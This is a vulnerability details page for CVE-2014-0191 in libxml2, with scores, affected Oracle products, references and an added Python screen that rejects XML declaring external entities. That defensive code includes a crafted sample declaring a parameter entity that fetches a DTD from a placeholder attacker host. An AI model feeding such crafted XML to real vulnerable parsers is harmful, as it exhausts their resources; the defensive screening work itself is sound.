Vulnerability Details : CVE-2014-0191
The xmlParserHandlePEReference function in parser.c in libxml2 before 2.9.2, as used in Web Listener in Oracle HTTP Server in Oracle Fusion Middleware 11.1.1.7.0, 12.1.2.0, and 12.1.3.0 and other products, loads external parameter entities regardless of whether entity substitution or validation is enabled, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XML document.
Vulnerability category: Denial of service
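The description above says the dangerous construct is an external parameter entity, declared in the document's DTD as `<!ENTITY % name SYSTEM "uri">`, that libxml2 before 2.9.2 fetches even when entity substitution and validation are off. The following is an added example written for this page, not libxml2's own code or the fix from the referenced commit: a pre-parse screen that inspects the DOCTYPE of untrusted XML and rejects any declaration that would make the parser load a resource. The sample documents and the hostname `attacker.invalid` are constructed for the example.

```python
"""Pre-parse screen for external entity declarations (added example).

Constructed for this page; not libxml2's code. CVE-2014-0191 concerns libxml2
before 2.9.2 fetching an external *parameter* entity (declared as
<!ENTITY % name SYSTEM "uri">) even when entity substitution and validation
are disabled. The guard below inspects the DOCTYPE of untrusted XML before it
reaches the parser and rejects anything that would make the parser fetch a
resource, so a crafted document never gets the chance to exhaust it.
"""
import re
from dataclasses import dataclass
from typing import List

# An entity declaration carrying an external identifier. The optional '%'
# marks a parameter entity. XML keywords are case-sensitive, but the screen
# ignores case so that it errs on the side of rejecting.
_EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[^\s%>]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+"
    r"(?P<lit1>\"[^\"]*\"|'[^']*')(?:\s+(?P<lit2>\"[^\"]*\"|'[^']*'))?",
    re.IGNORECASE,
)

# A DOCTYPE whose external subset itself lives at a SYSTEM/PUBLIC identifier.
# Not the subject of this CVE, but the same class of unwanted fetch.
_EXT_DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+[^\s\[>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


@dataclass
class ExternalEntity:
    name: str
    is_parameter: bool   # True for <!ENTITY % ...>, the CVE-2014-0191 case
    uri: str             # the system literal the parser would try to fetch


def find_external_entities(xml_text: str) -> List[ExternalEntity]:
    """Return every entity declared with a SYSTEM or PUBLIC identifier."""
    found = []
    for m in _EXT_ENTITY_RE.finditer(xml_text):
        # For PUBLIC the first literal is the public id; the URI follows it.
        lit = m.group("lit2") if m.group("kind").upper() == "PUBLIC" else m.group("lit1")
        uri = (lit or "")[1:-1]   # strip the surrounding quotes
        found.append(ExternalEntity(m.group("name"), m.group("pe") is not None, uri))
    return found


def has_external_dtd_subset(xml_text: str) -> bool:
    """True if the DOCTYPE points at an external DTD file."""
    return _EXT_DOCTYPE_RE.search(xml_text) is not None


def is_safe_to_parse(xml_text: str) -> bool:
    """True only if nothing in the DOCTYPE can make the parser load a resource.

    Screen the decoded text the parser will actually see; a comment inside the
    DTD containing a declaration causes a false rejection, which is acceptable
    for untrusted input.
    """
    return not has_external_dtd_subset(xml_text) and not find_external_entities(xml_text)


# Constructed sample: the shape of a document that triggers CVE-2014-0191.
# The hostname is a placeholder; a vulnerable libxml2 would try to fetch it
# even without XML_PARSE_NOENT or DTD validation.
CRAFTED = """<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY % remote SYSTEM "http://attacker.invalid/huge.dtd">
  %remote;
]>
<doc>hello</doc>
"""

# Constructed sample: an internal general entity only, nothing to fetch.
BENIGN = """<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY greeting "hello">
]>
<doc>&greeting;</doc>
"""

if __name__ == "__main__":
    for label, doc in (("crafted", CRAFTED), ("benign", BENIGN)):
        verdict = "accept" if is_safe_to_parse(doc) else "REJECT"
        print(f"{label}: {verdict}")
        for ent in find_external_entities(doc):
            kind = "parameter" if ent.is_parameter else "general"
            print(f"  external {kind} entity {ent.name!r} -> {ent.uri}")
```

Upgrading to libxml2 2.9.2 or later (the fix is the "Do not fetch external parameter entities" commit in the references) is the real remedy; this screen is defence in depth for code that cannot be sure which libxml2 it links against. It cannot be replaced by parser options alone on affected versions, because the point of the CVE is that the fetch happens regardless of the substitution and validation settings. Run the screen on the decoded text the parser will see, so that a document in an unexpected encoding cannot slip a declaration past it.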
Products affected by CVE-2014-0191
- cpe:2.3:a:oracle:fusion_middleware:11.1.1.7.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:fusion_middleware:12.1.2.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:fusion_middleware:12.1.3.0.0:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2014-0191
EPSS score: 2.41% (probability of exploitation activity in the next 30 days)
EPSS percentile: ~90% (the proportion of vulnerabilities scored at or below this level)
CVSS scores for CVE-2014-0191
Base Score | Base Severity | CVSS v2 Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P | 8.6 | 2.9 | NIST |
References for CVE-2014-0191
- http://xmlsoft.org/news.html (libxml2 Releases)
- https://support.apple.com/kb/HT205031 (About the security content of OS X Yosemite v10.10.5 and Security Update 2015-006 - Apple Support)
- https://bugzilla.redhat.com/show_bug.cgi?id=1090976 (Red Hat Bugzilla 1090976: CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled)
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html (Oracle Critical Patch Update - January 2015; Patch, Vendor Advisory)
- https://exchange.xforce.ibmcloud.com/vulnerabilities/93092 (IBM X-Force: Libxml2 xmlParserHandlePEReference() denial of service CVE-2014-0191 Vulnerability Report)
- http://lists.opensuse.org/opensuse-updates/2015-12/msg00120.html (openSUSE-SU-2015:2372-1: moderate: Security update for libxml2)
- http://www.securityfocus.com/bid/67233 (Libxml2 Entity Substitution CVE-2014-0191 Denial of Service Vulnerability)
- http://www-01.ibm.com/support/docview.wss?uid=swg21678183 (IBM Security Bulletin: Rational Systems Tester is affected by Libxml2 vulnerability (CVE-2014-0191))
- http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html (Apple - Lists.apple.com)
- http://lists.apple.com/archives/security-announce/2015/Aug/msg00002.html (Apple - Lists.apple.com)
- https://support.apple.com/kb/HT205030 (About the security content of iOS 8.4.1 - Apple Support)
- http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html (Oracle Critical Patch Update - October 2015)
- http://rhn.redhat.com/errata/RHSA-2015-0749.html (RHSA-2015:0749 - Security Advisory - Red Hat Customer Portal)
- https://git.gnome.org/browse/libxml2/commit/?id=9cd1c3cfbd32655d60572c0a413e017260c854df (GNOME libxml2 commit 9cd1c3cf: Do not fetch external parameter entities)